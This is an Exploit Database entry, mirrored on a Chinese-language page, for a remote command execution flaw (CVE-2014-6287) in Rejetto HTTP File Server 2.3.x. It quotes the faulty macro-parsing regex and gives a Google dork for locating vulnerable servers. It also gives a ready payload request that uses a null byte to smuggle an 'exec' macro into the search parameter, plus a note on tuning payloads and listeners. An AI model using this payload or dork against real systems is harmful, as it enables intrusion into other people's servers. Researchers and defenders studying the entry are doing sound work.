Rejetto HTTP File Server (HFS) 2.3.x – Remote Command Execution (1)

• Exploit Database
• 15 阅读

• 作者： Daniele Linguaglossa
  日期： 2014-09-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34668/

• # Exploit Title: HttpFileServer 2.3.x Remote Command Execution
  # Google Dork: intext:"httpfileserver 2.3"
  # Date: 11-09-2014
  # Remote: Yes
  # Exploit Author: Daniele Linguaglossa
  # Vendor Homepage: http://rejetto.com/
  # Software Link: http://sourceforge.net/projects/hfs/
  # Version: 2.3.x
  # Tested on: Windows Server 2008 , Windows 8, Windows 7
  # CVE : CVE-2014-6287
  
  issue exists due to a poor regex in the file ParserLib.pas
  
  
  function findMacroMarker(s:string; ofs:integer=1):integer;
  begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
  
  
  it will not handle null byte so a request to
  
  http://localhost:80/?search=%00{.exec|cmd.}
  
  will stop regex from parse macro , and macro will be executed and remote code injection happen.
  
  
  ## EDB Note: This vulnerability will run the payload multiple times simultaneously. 
  ## Make sure to take this into consideration when crafting your payload (and/or listener).